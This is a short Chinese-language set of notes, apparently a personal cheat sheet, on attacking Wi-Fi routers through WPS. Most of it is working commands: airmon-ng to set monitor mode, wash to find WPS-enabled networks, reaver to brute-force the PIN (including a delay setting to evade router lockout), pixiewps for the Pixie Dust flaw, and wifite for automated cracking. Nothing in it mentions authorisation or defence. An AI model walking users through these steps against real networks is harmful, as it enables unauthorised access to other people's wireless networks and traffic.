无线网WPS攻击(测试未成功)
提前准备:
注意:顺序最好不要乱了顺序。
1.service network-manager stop
2. airmon-ng check kill
3.连接外置网卡
4.airmon-ng start wlan0
(把网卡变为监听模式,输入ifconfig可看到wlan0已变成wlan0mon)
正式步骤:
1.利用wash扫描附近开启WPS的网络:wash -i wlan0mon
2.reaver -i wlan0mon -b bssid值 -c 10 -vv -k 1
(-c指定信道,使用-k 1 测试是否有芯片漏洞,若有则10秒之后就能破开WPS密码) 。
3.如果第2步未发现存在芯片漏洞的网络,则删除-k 1,则运行:reaver -i wlan0mon -b bssid值 -c 10 -vv
(reaver的-d参数指定延迟时间可以设为10秒,避免被路由锁定机制 )。
4.如果路由器有响应,也可以利用pixiewps指令来破有漏洞的网络:
命令:输入pixiewps查看提示。
5.如果破得wps密码,则使用:reaver -i wlan0mon -b bssid值 -vv -p 破得的wps值
(也可以加-c 10选择信道)。
6.也可以尝试用wifite来傻瓜式的破解。输入wifite命令查看提示。